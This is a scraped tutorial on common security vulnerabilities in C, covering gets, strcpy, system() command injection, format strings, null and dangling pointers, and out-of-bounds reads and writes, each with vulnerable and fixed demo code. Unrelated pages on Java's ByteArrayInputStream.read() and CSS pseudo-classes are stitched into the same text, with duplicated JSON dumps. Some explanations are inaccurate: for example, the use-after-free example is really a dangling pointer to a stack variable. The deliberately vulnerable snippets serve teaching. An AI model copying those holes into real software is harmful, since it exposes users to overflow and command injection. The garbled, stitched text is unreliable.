0; i < size; i++) { printf("%d ", arr[i]); } return 0;} Output: Input: 1 2 3 4 5 6 7 8 9 10Output: 1 2 3 4 5 Explanation:In the above code, the sizeof operator is being used to determine the size of the array so that one can get the valid range of the index. sizeof(arr) will give the entire size of the array and sizeof(arr[0]) will give the size of one element so using the divide operation one can easily find the number of elements in the array followed by the range of the index. 2. Out of Bounds Read: CWE CODE: CWE-125. In this, the software reads the data before or after the intended buffer. Attackers may use this to read sensitive information from other memory locations or may cause crashes.Observed CVEs are CVE-2014-0160, CVE-2009-2523, CVE-2004-0184 etc.Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit is there if (index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf("%d", j); return 0;} Output: 0 Explanation:In this above code, the if statement within the function only checking the index value is less than the size of the array or not. The attacker may give a negative value as an index even that is not valid still the read operation will be executed which will eventually cause the reading of unintended data. Mitigation: Input validation. Ensure to validate correct calculations for length of an argument, buffer size, etc. Below is the C program to demonstrate the above concept- C // C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit and minimum // limit is there if (index >= 0 && index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf("%d", j); return 0;} Output: -1 Explanation:In this code, both maximum and minimum index range is checked in the if statement. If the attacker tries to give invalid indexes then the read operation will not be performed. gulshankumarar231 surindertarika1234 C Language Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments TCP Server-Client implementation in C Exception Handling in C++ Multithreading in C Arrow operator -> in C/C++ with Examples 'this' pointer in C++ How to split a string in C/C++, Python and Java? UDP Server-Client implementation in C Smart Pointers in C++ and How to Use Them How to dynamically allocate a 2D array in C? Unordered Sets in C++ Standard Template Library
[ { "code": null, "e": 23817, "s": 23789, "text": "\n01 Dec, 2021" }, { "code": null, "e": 24304, "s": 23817, "text": "C is a very powerful and popular programming language. It was first developed in the 1970s. C language is used in programming Network drivers, Interpreters, and Compilers, etc.Even though the C language is widely used in different systems still it has many security flaws associated with it. This article focuses on discussing security vulnerabilities in the C language. Mainly these security issues are related to vulnerable library functions, No bound checking for array and Pointers." }, { "code": null, "e": 24374, "s": 24304, "text": "Vulnerable Library Functions:CWE Codes: CWE – 242 , CWE – 120, CWE-77" }, { "code": null, "e": 24404, "s": 24374, "text": "1. Buffer And Memory Related:" }, { "code": null, "e": 24650, "s": 24404, "text": "a. gets(): This function is a part of the standard input-output library of the C language. It does not have any check for buffer size and malicious input can easily cause a buffer overflow.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 24652, "s": 24650, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char buf[24]; printf(\"Please enter your name and press <Enter>\\n\"); gets(buf); printf(\"%s\", buf); return 0;}", "e": 24867, "s": 24652, "text": null }, { "code": null, "e": 24876, "s": 24867, "text": "Warning:" }, { "code": null, "e": 25166, "s": 24876, "text": "prog.c: In function ‘main’: prog.c:10:1: warning: implicit declaration of function ‘gets’ [-Wimplicit-function-declaration] gets(buf); ^ /tmp/ccmwzcCQ.o: In function `main’: 69c380139e12adbab30e0550af51f5a9.c:(.text+0x2e): warning: the `gets’ function is dangerous and should not be used. " }, { "code": null, "e": 25174, "s": 25166, "text": "Output:" }, { "code": null, "e": 25250, "s": 25174, "text": "Input: GeeksforGeeksOutput: Please enter your name and press GeeksforGeeks " }, { "code": null, "e": 25564, "s": 25250, "text": "Explanation:In the above code, the attacker can give large chunk of data as input, and the gets() function will try to store all that data into the buffer without considering the buffer size which will eventually cause a buffer overflow situation that can further cause arbitrary code execution, information leak." }, { "code": null, "e": 25768, "s": 25564, "text": "Mitigation:To solve this issue with the gets() function. Programmers can use fgets() function. It limits the input length based on the buffer size.Below is the C program to implement the above approach- " }, { "code": null, "e": 25770, "s": 25768, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#define MAX 15 // Driver codeint main(){ char buf[MAX]; fgets(buf, MAX, stdin); printf(\"%s\", buf); return 0;}", "e": 25956, "s": 25770, "text": null }, { "code": null, "e": 25964, "s": 25956, "text": "Output:" }, { "code": null, "e": 26007, "s": 25964, "text": "Input: GeeksforGeeksOutput: GeeksforGeeks " }, { "code": null, "e": 26205, "s": 26007, "text": "Explanation:In the above code, fgets() function is taking buffer size ‘MAX’ as an argument and it will only write data that can be safely stored into the buffer of that size without overflowing it." }, { "code": null, "e": 26735, "s": 26205, "text": "b. strcpy(): This built-in function also doesn’t check for the buffer length and can overwrite memory locations based on the malicious input.If the buffer size of dest string is more then src string, then copy the src string to dest string with terminating NULL character. But if dest buffer is less, then src then it will copy the content without terminating NULL character. The strings may not overlap, and the destination string must be large enough to receive the copy.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 26737, "s": 26735, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <string.h> // Driver codeint main(){ char str1[2]; char str2[] = \"GeeksforGeeks\"; strcpy(str1, str2); printf(\"Copied string is: %s\\n\", str1); return 0;}", "e": 26978, "s": 26737, "text": null }, { "code": null, "e": 26986, "s": 26978, "text": "Output:" }, { "code": null, "e": 27047, "s": 26986, "text": "Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks " }, { "code": null, "e": 27295, "s": 27047, "text": "Explanation:In the above code, strcpy() function is trying to copy the string available on str2[] to str1[] which does not have enough space in a buffer allocated to handle that which will eventually result in a buffer overflow in the application." }, { "code": null, "e": 27482, "s": 27295, "text": "Mitigation:Use of strncpy() function instead of strcpy(). strncpy() limits the length of input based on the buffer size available.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 27484, "s": 27482, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <string.h>#define BUFFER_SIZE 24 // Driver codeint main(){ // 24 is the buffer size char str1[BUFFER_SIZE]; char str2[] = \"GeeksforGeeks\"; // Limits number of characters // to be copied strncpy(str1, str2, BUFFER_SIZE); printf(\"Copied string is: %s\\n\", str1); return 0;}", "e": 27853, "s": 27484, "text": null }, { "code": null, "e": 27861, "s": 27853, "text": "Output:" }, { "code": null, "e": 27922, "s": 27861, "text": "Input: GeeksforGeeksOutput: Copied string is: GeeksforGeeks " }, { "code": null, "e": 28397, "s": 27922, "text": "Explanation:In the above code, strncpy() function is taking BUFFER_SIZE as an argument and it will only write data that can be safely stored into the str1[ ] without overflowing the buffer. Using strcpy() function to copy a large character array into a smaller one is dangerous, but if the string will fit, then it will not be worth the risk. If the destination string is not large enough to store the source string then the behavior of strcpy() is unspecified or undefined." }, { "code": null, "e": 28500, "s": 28397, "text": "Note:Other library functions with same type of vulnerability- calloc, malloc, realloc, strcat, memcpy." }, { "code": null, "e": 28727, "s": 28500, "text": "2. Command execution Vulnerabilities:If the attacker can control the command text or arguments to an external function call, then he can run arbitrary codes very easily.Below is the C program to demonstrate the above concept- " }, { "code": null, "e": 28729, "s": 28727, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <stdlib.h>#include <unistd.h> // Driver codeint main(){ char str[40]; fgets(str, 39, stdin); system(str); printf(\"%s\", str);}", "e": 28940, "s": 28729, "text": null }, { "code": null, "e": 28956, "s": 28940, "text": "Runtime Errors:" }, { "code": null, "e": 28988, "s": 28956, "text": "sh: 1: GeeksforGeeks: not found" }, { "code": null, "e": 28996, "s": 28988, "text": "Output:" }, { "code": null, "e": 29038, "s": 28996, "text": "Input: GeeksforGeeksOutput: GeeksforGeeks" }, { "code": null, "e": 29244, "s": 29038, "text": "Explanation:In the above code, if the str is controlled by the attacker then he can execute any command to the system and can put the entire system at risk. Observed CVEs are CVE-1999-0067, CVE-2019-12921." }, { "code": null, "e": 29256, "s": 29244, "text": "Mitigation:" }, { "code": null, "e": 29338, "s": 29256, "text": "Ensure that all external commands called from the program are statically created." }, { "code": null, "e": 29426, "s": 29338, "text": "Use library calls rather than external processes to recreate the desired functionality." }, { "code": null, "e": 29515, "s": 29426, "text": "Note:Other library functions with the same type of vulnerability: execl, execle, popen. " }, { "code": null, "e": 29999, "s": 29515, "text": "3. Format String Vulnerabilities:Format specifiers like %d, %s if used in an improper way within the code than it may give the edge to the attacker for gaining access for arbitrary code execution, information leak and can also completely control the application. If successful, it returns the total number of characters written excluding null-character appended in the string, in case of failure a negative number is returned. Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 30001, "s": 29999, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ char str[5]; sprintf(str, \"%s\", \"GGGGGGGGGGGGGG\"); printf(\"%s\", str);}", "e": 30183, "s": 30001, "text": null }, { "code": null, "e": 30198, "s": 30183, "text": "Runtime Error:" }, { "code": null, "e": 30236, "s": 30198, "text": "Abort signal from abort(3) (SIGABRT) " }, { "code": null, "e": 30644, "s": 30236, "text": "Explanation:In this above code, the sprintf function with format specifier %s may cause a buffer overflow because the output size is 15 which is greater than the size of buffer received that is of size 5 only. Besides this, the str[ ] can also be controlled by a external agent and cause all the above mentioned vulnerabilities (CWE – 13 ). Observed CVEs are CVE-2001-0717, CVE-2002-1788, CVE-2006-2480 etc." }, { "code": null, "e": 30656, "s": 30644, "text": "Mitigation:" }, { "code": null, "e": 30695, "s": 30656, "text": "Choose a language not have such flaws." }, { "code": null, "e": 30801, "s": 30695, "text": "Ensure that all format string functions are passed a static string that cannot be controlled by the user." }, { "code": null, "e": 30870, "s": 30801, "text": "Use functions that do not support the %n operator in format strings." }, { "code": null, "e": 30972, "s": 30870, "text": "Note:Other library functions with the same type of vulnerability: fprintf, printf, sprintf, snprintf." }, { "code": null, "e": 31076, "s": 30972, "text": "Concept of Pointer:The pointer concept causes multiple security issues with the C programming language." }, { "code": null, "e": 31459, "s": 31076, "text": "1. NULL Pointer Dereference: CWE CODE: CWE-476. If a program dereference a pointer that is expected to be valid but turns out as NULL then it causes program crash, exit. Mitigation to this is to do a check for the NULL pointer before performing any operation. Observed CVEs are CVE-2005-3274, CVE-2005-1912, CVE-2004-0079 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 31461, "s": 31459, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; *p = val; printf(\"%d\", *p); return 0;}", "e": 31634, "s": 31461, "text": null }, { "code": null, "e": 31649, "s": 31634, "text": "Runtime Error:" }, { "code": null, "e": 31678, "s": 31649, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 31874, "s": 31678, "text": "Explanation:In this code, *p is a NULL pointer which means it does not point to a memory location and trying to dereference it results in unexpected behavior in the program or segmentation fault." }, { "code": null, "e": 31971, "s": 31874, "text": "Mitigation:Below is the C program to demonstrate the mitigation stratergy for the above problem-" }, { "code": null, "e": 31973, "s": 31971, "text": "C" }, { "code": "// C program to implement// the above concept#include <stdio.h> // Driver codeint main(){ int val = 1; int* p = NULL; if (p == NULL) { printf(\"Pointer is NULL\"); } else { *p = val; printf(\"%d\", *p); } return 0;}", "e": 32227, "s": 31973, "text": null }, { "code": null, "e": 32235, "s": 32227, "text": "Output:" }, { "code": null, "e": 32252, "s": 32235, "text": "Pointer is NULL " }, { "code": null, "e": 32500, "s": 32252, "text": "Explanation:In this code, the first check is performed for a NULL pointer, before doing any operation on a pointer. Here is the if statement checks for the NULL condition and if it is found to be true then no further operation is getting executed." }, { "code": null, "e": 32890, "s": 32500, "text": "2. Use after Free(Commonly referred to as Dangling pointer): CWE CODE: CWE-416. If a referencing memory is freed and then there is any attempt made to free that again, then it cause this situation. It can cause a program crash, information leak, and data corruption. Observed CVEs are CVE-2010-4168, CVE-2010-2941, CVE-2010-2547 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 32892, "s": 32890, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int* fun(){ int y = 10; return &y;} // Driver codeint main(){ int* p = fun(); printf(\"%d\", *p); return 0;}", "e": 33078, "s": 32892, "text": null }, { "code": null, "e": 33087, "s": 33078, "text": "Output: " }, { "code": null, "e": 33116, "s": 33087, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 33530, "s": 33116, "text": "Explanation:In the above code, the main() function the *p contains the return value of the fun(). With the call of fun() the control moves to the context of the int *fun(), the fun() returns the address of the ‘y’ variable but in the context of main() ‘y’ is no longer available after the program flow returned. Therefore, it can be said that the *p is a dangling pointer as it points to the de-allocated memory." }, { "code": null, "e": 33640, "s": 33530, "text": "Mitigation:After freeing pointers set them to NULL. Below is the C program to demonstrate the above concept- " }, { "code": null, "e": 33642, "s": 33640, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>#include <stdlib.h> // Driver codeint main(){ int n = 5; int* ptr; ptr = (int*)malloc(n * sizeof(int)); // Memory has been successfully allocated printf(\"Memory successfully allocated using malloc.\\n\"); // Free the memory free(ptr); printf(\"Malloc Memory successfully freed.\\n\"); // freed pointer set to NULL value ptr = NULL; return 0;}", "e": 34081, "s": 33642, "text": null }, { "code": null, "e": 34089, "s": 34081, "text": "Output:" }, { "code": null, "e": 34168, "s": 34089, "text": "Memory successfully allocated using malloc. Malloc Memory successfully freed. " }, { "code": null, "e": 34319, "s": 34168, "text": "Explanation:In this above code, after free(ptr) operation the ptr pointer value is set to NULL and it will mitigate the chances of a dangling pointer." }, { "code": null, "e": 34348, "s": 34319, "text": "No bound Checking for Array:" }, { "code": null, "e": 34653, "s": 34348, "text": "1. Out of Bounds Write: CWE CODE: CWE-787 In this, the software writes the data before or after the intended buffer. It may cause execution of unauthorized codes, Crash and restart. Observed CVEs are CVE-2020-0022, CVE-2009-0269, CVE-2009-1532 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 34655, "s": 34653, "text": "C" }, { "code": "// Program to demonstrate// accessing array out of bounds#include <stdio.h>int main(){ int arr[] = { 1, 2, 3, 4, 5 }; printf(\"arr [0] is %d\\n\", arr[0]); printf(\"arr[10] is %d\\n\", arr[10]); // allocation memory to out of bound // element arr[10] = 11; printf(\"arr[10] is %d\\n\", arr[10]); return 0;}", "e": 34978, "s": 34655, "text": null }, { "code": null, "e": 34993, "s": 34978, "text": "Runtime Error:" }, { "code": null, "e": 35022, "s": 34993, "text": "Segmentation Fault (SIGSEGV)" }, { "code": null, "e": 35343, "s": 35022, "text": "Explanation:In this above code, array has valid indexes 0, 1, 2, 3, and 4 but there is an attempt to write the value on the arr[10]. As the C compiler will not check for the array bound it will write that data after the intended buffer. But when there is an attempt to print the value at index 10, it will show an error." }, { "code": null, "e": 35355, "s": 35343, "text": "Mitigation:" }, { "code": null, "e": 35400, "s": 35355, "text": "Always make sure the buffer is large enough." }, { "code": null, "e": 35474, "s": 35400, "text": "Functions used to accept input should have a buffer limit implementation." }, { "code": null, "e": 35531, "s": 35474, "text": "Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 35533, "s": 35531, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int arr[5]; // Driver codeint main(){ int size = sizeof(arr) / sizeof(arr[0]); for (int i = 0; i < size; i++) { scanf(\"%d\", &arr[i]); } // Print elements of array for (int i = 0; i < size; i++) { printf(\"%d \", arr[i]); } return 0;}", "e": 35866, "s": 35533, "text": null }, { "code": null, "e": 35875, "s": 35866, "text": "Output: " }, { "code": null, "e": 35921, "s": 35875, "text": "Input: 1 2 3 4 5 6 7 8 9 10Output: 1 2 3 4 5 " }, { "code": null, "e": 36297, "s": 35921, "text": "Explanation:In the above code, the sizeof operator is being used to determine the size of the array so that one can get the valid range of the index. sizeof(arr) will give the entire size of the array and sizeof(arr[0]) will give the size of one element so using the divide operation one can easily find the number of elements in the array followed by the range of the index." }, { "code": null, "e": 36638, "s": 36297, "text": "2. Out of Bounds Read: CWE CODE: CWE-125. In this, the software reads the data before or after the intended buffer. Attackers may use this to read sensitive information from other memory locations or may cause crashes.Observed CVEs are CVE-2014-0160, CVE-2009-2523, CVE-2004-0184 etc.Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 36640, "s": 36638, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit is there if (index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf(\"%d\", j); return 0;}", "e": 37071, "s": 36640, "text": null }, { "code": null, "e": 37079, "s": 37071, "text": "Output:" }, { "code": null, "e": 37081, "s": 37079, "text": "0" }, { "code": null, "e": 37399, "s": 37081, "text": "Explanation:In this above code, the if statement within the function only checking the index value is less than the size of the array or not. The attacker may give a negative value as an index even that is not valid still the read operation will be executed which will eventually cause the reading of unintended data." }, { "code": null, "e": 37411, "s": 37399, "text": "Mitigation:" }, { "code": null, "e": 37429, "s": 37411, "text": "Input validation." }, { "code": null, "e": 37514, "s": 37429, "text": "Ensure to validate correct calculations for length of an argument, buffer size, etc." }, { "code": null, "e": 37571, "s": 37514, "text": "Below is the C program to demonstrate the above concept-" }, { "code": null, "e": 37573, "s": 37571, "text": "C" }, { "code": "// C program to implement// the above approach#include <stdio.h>int getValueFromArray(int* arr, int size, int index){ int value = -1; // only maximum limit and minimum // limit is there if (index >= 0 && index < size) { value = arr[index]; } return value;} // Driver codeint main(){ int arrtest[] = { 1, 2, 3, 4, 5 }; int j = getValueFromArray(arrtest, 5, -1); printf(\"%d\", j); return 0;}", "e": 38042, "s": 37573, "text": null }, { "code": null, "e": 38051, "s": 38042, "text": "Output: " }, { "code": null, "e": 38054, "s": 38051, "text": "-1" }, { "code": null, "e": 38242, "s": 38054, "text": "Explanation:In this code, both maximum and minimum index range is checked in the if statement. If the attacker tries to give invalid indexes then the read operation will not be performed." }, { "code": null, "e": 38260, "s": 38242, "text": "gulshankumarar231" }, { "code": null, "e": 38279, "s": 38260, "text": "surindertarika1234" }, { "code": null, "e": 38290, "s": 38279, "text": "C Language" }, { "code": null, "e": 38388, "s": 38290, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 38397, "s": 38388, "text": "Comments" }, { "code": null, "e": 38410, "s": 38397, "text": "Old Comments" }, { "code": null, "e": 38448, "s": 38410, "text": "TCP Server-Client implementation in C" }, { "code": null, "e": 38474, "s": 38448, "text": "Exception Handling in C++" }, { "code": null, "e": 38494, "s": 38474, "text": "Multithreading in C" }, { "code": null, "e": 38535, "s": 38494, "text": "Arrow operator -> in C/C++ with Examples" }, { "code": null, "e": 38557, "s": 38535, "text": "'this' pointer in C++" }, { "code": null, "e": 38606, "s": 38557, "text": "How to split a string in C/C++, Python and Java?" }, { "code": null, "e": 38644, "s": 38606, "text": "UDP Server-Client implementation in C" }, { "code": null, "e": 38686, "s": 38644, "text": "Smart Pointers in C++ and How to Use Them" }, { "code": null, "e": 38731, "s": 38686, "text": "How to dynamically allocate a 2D array in C?" } ]
ByteArrayInputStream read() method in Java with Examples - GeeksforGeeks
28 May, 2020 The read() method of ByteArrayInputStream class in Java is used in two ways: 1. The read() method of ByteArrayInputStream class in Java is used to read the next byte of the ByteArrayInputStream. This read() method returns the byte that is read int the form of an integer and if the input stream is ended this method return -1. This method reads one byte at a time from the stream. Syntax: public int read() Specified By: This method is specified by read() method of InputStream class. Parameters: This method does not accept any parameter. Return value: This method returns the read byte in the form of an integer. If the stream is ended then it returns -1. Exceptions: This method does not throw any exception. Below program illustrates read() method in ByteArrayInputStream class in IO package: Program: // Java program to illustrate// ByteArrayInputStream read() method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); int b = 0; while ((b = byteArrayInputStr.read()) != -1) { // Convert byte to character char ch = (char)b; // Print the character System.out.println("Char : " + ch); } }} Char : G Char : E Char : E Char : K Char : S 2. The read(byte[ ], int, int) method of ByteArrayInputStream class in Java is used to read the given number of bytes into the given byte array from the ByteArrayOutputStream. This method is different from the above read() method as it can read several bytes at a time. It returns the total number of bytes read as the return value. Syntax: public void read(byte[ ] b, int offset, int length) Overrides: This method overrides read() method of InputStream class. Parameters: This method accepts three parameters: b – It represents the byte array into which data is read. offset – It represents the starting index in the byte array b. length – It represents the number of bytes to be read. Return value: This method returns total number of bytes read into the buffer. If the input stream is ended, this method returns -1. Exceptions: NullPointerException – This method throws NullPointerException if the byte array b is null. IndexOutOfBoundsException – This method throws IndexOutOfBoundsException if the length is greater than the length of input stream after offset or offset is negative or length is negative. Below program illustrates read(byte[ ], int, int) method in ByteArrayInputStream class in IO package: Program: // Java program to illustrate// ByteArrayInputStream// read(byte[ ], int, int) method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); // Create buffer byte[] b = new byte[4]; int total_bytes = byteArrayInputStr.read(b, 1, 3); // Total number of bytes read System.out.println("Total bytes read: " + total_bytes); for (byte ch : b) { // Print the character if (ch == 0) System.out.println("NULL"); else System.out.println((char)ch); } }} Total bytes read: 3 NULL G E E References:1. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read()2. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read(byte%5B%5D, int, int) Java-Functions Java-IO package Java Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Functional Interfaces in Java Stream In Java Constructors in Java Different ways of Reading a text file in Java Exceptions in Java Generics in Java Comparator Interface in Java with Examples Strings in Java Difference between Abstract Class and Interface in Java How to remove an element from ArrayList in Java?
[ { "code": null, "e": 23557, "s": 23529, "text": "\n28 May, 2020" }, { "code": null, "e": 23634, "s": 23557, "text": "The read() method of ByteArrayInputStream class in Java is used in two ways:" }, { "code": null, "e": 23938, "s": 23634, "text": "1. The read() method of ByteArrayInputStream class in Java is used to read the next byte of the ByteArrayInputStream. This read() method returns the byte that is read int the form of an integer and if the input stream is ended this method return -1. This method reads one byte at a time from the stream." }, { "code": null, "e": 23946, "s": 23938, "text": "Syntax:" }, { "code": null, "e": 23965, "s": 23946, "text": "public int read()\n" }, { "code": null, "e": 24043, "s": 23965, "text": "Specified By: This method is specified by read() method of InputStream class." }, { "code": null, "e": 24098, "s": 24043, "text": "Parameters: This method does not accept any parameter." }, { "code": null, "e": 24216, "s": 24098, "text": "Return value: This method returns the read byte in the form of an integer. If the stream is ended then it returns -1." }, { "code": null, "e": 24270, "s": 24216, "text": "Exceptions: This method does not throw any exception." }, { "code": null, "e": 24355, "s": 24270, "text": "Below program illustrates read() method in ByteArrayInputStream class in IO package:" }, { "code": null, "e": 24364, "s": 24355, "text": "Program:" }, { "code": "// Java program to illustrate// ByteArrayInputStream read() method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); int b = 0; while ((b = byteArrayInputStr.read()) != -1) { // Convert byte to character char ch = (char)b; // Print the character System.out.println(\"Char : \" + ch); } }}", "e": 24987, "s": 24364, "text": null }, { "code": null, "e": 25033, "s": 24987, "text": "Char : G\nChar : E\nChar : E\nChar : K\nChar : S\n" }, { "code": null, "e": 25366, "s": 25033, "text": "2. The read(byte[ ], int, int) method of ByteArrayInputStream class in Java is used to read the given number of bytes into the given byte array from the ByteArrayOutputStream. This method is different from the above read() method as it can read several bytes at a time. It returns the total number of bytes read as the return value." }, { "code": null, "e": 25374, "s": 25366, "text": "Syntax:" }, { "code": null, "e": 25461, "s": 25374, "text": "public void read(byte[ ] b,\n int offset,\n int length)\n" }, { "code": null, "e": 25530, "s": 25461, "text": "Overrides: This method overrides read() method of InputStream class." }, { "code": null, "e": 25580, "s": 25530, "text": "Parameters: This method accepts three parameters:" }, { "code": null, "e": 25638, "s": 25580, "text": "b – It represents the byte array into which data is read." }, { "code": null, "e": 25701, "s": 25638, "text": "offset – It represents the starting index in the byte array b." }, { "code": null, "e": 25756, "s": 25701, "text": "length – It represents the number of bytes to be read." }, { "code": null, "e": 25888, "s": 25756, "text": "Return value: This method returns total number of bytes read into the buffer. If the input stream is ended, this method returns -1." }, { "code": null, "e": 25900, "s": 25888, "text": "Exceptions:" }, { "code": null, "e": 25992, "s": 25900, "text": "NullPointerException – This method throws NullPointerException if the byte array b is null." }, { "code": null, "e": 26180, "s": 25992, "text": "IndexOutOfBoundsException – This method throws IndexOutOfBoundsException if the length is greater than the length of input stream after offset or offset is negative or length is negative." }, { "code": null, "e": 26282, "s": 26180, "text": "Below program illustrates read(byte[ ], int, int) method in ByteArrayInputStream class in IO package:" }, { "code": null, "e": 26291, "s": 26282, "text": "Program:" }, { "code": "// Java program to illustrate// ByteArrayInputStream// read(byte[ ], int, int) method import java.io.*; public class GFG { public static void main(String[] args) throws Exception { // Create byte array byte[] buf = { 71, 69, 69, 75, 83 }; // Create byteArrayInputStream ByteArrayInputStream byteArrayInputStr = new ByteArrayInputStream(buf); // Create buffer byte[] b = new byte[4]; int total_bytes = byteArrayInputStr.read(b, 1, 3); // Total number of bytes read System.out.println(\"Total bytes read: \" + total_bytes); for (byte ch : b) { // Print the character if (ch == 0) System.out.println(\"NULL\"); else System.out.println((char)ch); } }}", "e": 27157, "s": 26291, "text": null }, { "code": null, "e": 27189, "s": 27157, "text": "Total bytes read: 3\nNULL\nG\nE\nE\n" }, { "code": null, "e": 27393, "s": 27189, "text": "References:1. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read()2. https://docs.oracle.com/javase/10/docs/api/java/io/ByteArrayInputStream.html#read(byte%5B%5D, int, int)" }, { "code": null, "e": 27408, "s": 27393, "text": "Java-Functions" }, { "code": null, "e": 27424, "s": 27408, "text": "Java-IO package" }, { "code": null, "e": 27429, "s": 27424, "text": "Java" }, { "code": null, "e": 27434, "s": 27429, "text": "Java" }, { "code": null, "e": 27532, "s": 27434, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27541, "s": 27532, "text": "Comments" }, { "code": null, "e": 27554, "s": 27541, "text": "Old Comments" }, { "code": null, "e": 27584, "s": 27554, "text": "Functional Interfaces in Java" }, { "code": null, "e": 27599, "s": 27584, "text": "Stream In Java" }, { "code": null, "e": 27620, "s": 27599, "text": "Constructors in Java" }, { "code": null, "e": 27666, "s": 27620, "text": "Different ways of Reading a text file in Java" }, { "code": null, "e": 27685, "s": 27666, "text": "Exceptions in Java" }, { "code": null, "e": 27702, "s": 27685, "text": "Generics in Java" }, { "code": null, "e": 27745, "s": 27702, "text": "Comparator Interface in Java with Examples" }, { "code": null, "e": 27761, "s": 27745, "text": "Strings in Java" }, { "code": null, "e": 27817, "s": 27761, "text": "Difference between Abstract Class and Interface in Java" } ]
CSS Pseudo-classes
A pseudo-class is used to define a special state of an element. For example, it can be used to: Style an element when a user mouses over it Style visited and unvisited links differently Style an element when it gets focus Mouse Over Me The syntax of pseudo-classes: Links can be displayed in different ways: Note: a:hover MUST come after a:link and a:visited in the CSS definition in order to be effective! a:active MUST come after a:hover in the CSS definition in order to be effective! Pseudo-class names are not case-sensitive. Pseudo-classes can be combined with HTML classes: When you hover over the link in the example, it will change color: An example of using the :hover pseudo-class on a <div> element: Hover over a <div> element to show a <p> element (like a tooltip): Tada! Here I am! The :first-child pseudo-class matches a specified element that is the first child of another element. In the following example, the selector matches any <p> element that is the first child of any element: In the following example, the selector matches the first <i> element in all <p> elements: In the following example, the selector matches all <i> elements in <p> elements that are the first child of another element: The :lang pseudo-class allows you to define special rules for different languages. In the example below, :lang defines the quotation marks for <q> elements with lang="no": Add different styles to hyperlinks This example demonstrates how to add other styles to hyperlinks. Use of :focus This example demonstrates how to use the :focus pseudo-class. Set the background-color to red, when you mouse over a link. <style> { background-color: red; } </style> <body> <h1>This is a header.</h1> <p>This is a paragraph.</p> <a href="https://w3schools.com">This is a link.</a> </body> Start the Exercise We just launchedW3Schools videos Get certifiedby completinga course today! If you want to report an error, or if you want to make a suggestion, do not hesitate to send us an e-mail: [email protected] Your message has been sent to W3Schools.
[ { "code": null, "e": 65, "s": 0, "text": "A pseudo-class is used to define a special state \nof an element." }, { "code": null, "e": 97, "s": 65, "text": "For example, it can be used to:" }, { "code": null, "e": 141, "s": 97, "text": "Style an element when a user mouses over it" }, { "code": null, "e": 187, "s": 141, "text": "Style visited and unvisited links differently" }, { "code": null, "e": 223, "s": 187, "text": "Style an element when it gets focus" }, { "code": null, "e": 237, "s": 223, "text": "Mouse Over Me" }, { "code": null, "e": 267, "s": 237, "text": "The syntax of pseudo-classes:" }, { "code": null, "e": 309, "s": 267, "text": "Links can be displayed in different ways:" }, { "code": null, "e": 534, "s": 309, "text": "Note: a:hover MUST come after a:link and \na:visited in the CSS definition in order to be effective! a:active MUST come after \na:hover in the CSS definition in order to be effective!\nPseudo-class names are not case-sensitive." }, { "code": null, "e": 584, "s": 534, "text": "Pseudo-classes can be combined with HTML classes:" }, { "code": null, "e": 651, "s": 584, "text": "When you hover over the link in the example, it will change color:" }, { "code": null, "e": 715, "s": 651, "text": "An example of using the :hover pseudo-class on a <div> element:" }, { "code": null, "e": 782, "s": 715, "text": "Hover over a <div> element to show a <p> element (like a tooltip):" }, { "code": null, "e": 799, "s": 782, "text": "Tada! Here I am!" }, { "code": null, "e": 901, 